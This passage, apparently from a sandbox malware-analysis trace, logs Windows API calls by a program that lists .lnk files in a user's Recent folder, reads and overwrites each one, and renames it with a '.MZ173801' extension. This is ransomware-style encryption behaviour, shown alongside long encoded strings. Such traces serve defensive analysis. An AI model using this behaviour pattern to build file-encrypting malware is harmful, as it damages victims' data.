lpOverlapped=0x0) returned 1 [0106.716] CloseHandle (hObject=0x3f4) returned 1 [0106.717] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\6ja7hKM dEHm7uKsn.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\6ja7hkm dehm7uksn.lnk"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\6ja7hKM dEHm7uKsn.lnk.MZ173801" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\6ja7hkm dehm7uksn.lnk.mz173801")) returned 1 [0106.717] GetCurrentThreadId () returned 0x1358 [0106.718] GetCurrentThreadId () returned 0x1358 [0106.718] GetCurrentThreadId () returned 0x1358 [0106.718] GetCurrentThreadId () returned 0x1358 [0106.718] GetCurrentThreadId () returned 0x1358 [0106.718] GetCurrentThreadId () returned 0x1358 [0106.718] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70979561, ftCreationTime.dwHighDateTime=0x1d5fb6e, ftLastAccessTime.dwLowDateTime=0x70979561, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0x70979561, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x37f, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="6o05.lnk", cAlternateFileName="")) returned 1 [0106.718] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0106.718] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0106.718] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\6o05.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\6o05.lnk"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70979561, ftCreationTime.dwHighDateTime=0x1d5fb6e, ftLastAccessTime.dwLowDateTime=0x70979561, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0x70979561, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x37f)) returned 1 [0106.718] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0106.718] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0106.718] GetCurrentThreadId () returned 0x1358 [0106.719] GetCurrentThreadId () returned 0x1358 [0106.719] GetCurrentThreadId () returned 0x1358 [0106.719] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0106.719] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0106.719] GetCurrentThreadId () returned 0x1358 [0106.719] GetCurrentThreadId () returned 0x1358 [0106.719] GetCurrentThreadId () returned 0x1358 [0106.719] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\6o05.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\6o05.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0106.719] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0106.720] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0106.720] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x37f [0106.720] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0106.720] ReadFile (in: hFile=0x3f4, lpBuffer=0x2431b30, nNumberOfBytesToRead=0x37f, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f9b0*=0x37f, lpOverlapped=0x0) returned 1 [0106.721] CloseHandle (hObject=0x3f4) returned 1 [0106.721] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\6o05.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\6o05.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0106.722] WriteFile (in: hFile=0x3f4, lpBuffer=0x2433b60*, nNumberOfBytesToWrite=0x37f, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x2433b60*, lpNumberOfBytesWritten=0x19f9bc*=0x37f, lpOverlapped=0x0) returned 1 [0106.723] CloseHandle (hObject=0x3f4) returned 1 [0106.723] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\6o05.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\6o05.lnk"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\6o05.lnk.MZ173801" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\6o05.lnk.mz173801")) returned 1 [0106.724] GetCurrentThreadId () returned 0x1358 [0106.724] GetCurrentThreadId () returned 0x1358 [0106.724] GetCurrentThreadId () returned 0x1358 [0106.724] GetCurrentThreadId () returned 0x1358 [0106.724] GetCurrentThreadId () returned 0x1358 [0106.724] GetCurrentThreadId () returned 0x1358 [0106.724] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeac7a032, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0xeac7a032, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xeac7a032, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x3d1, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="7CvyycdQ.lnk", cAlternateFileName="")) returned 1 [0106.724] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0106.724] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0106.724] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\7CvyycdQ.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\7cvyycdq.lnk"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeac7a032, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0xeac7a032, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xeac7a032, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x3d1)) returned 1 [0106.725] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0106.725] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0106.725] GetCurrentThreadId () returned 0x1358 [0106.725] GetCurrentThreadId () returned 0x1358 [0106.725] GetCurrentThreadId () returned 0x1358 [0106.725] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0106.725] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEM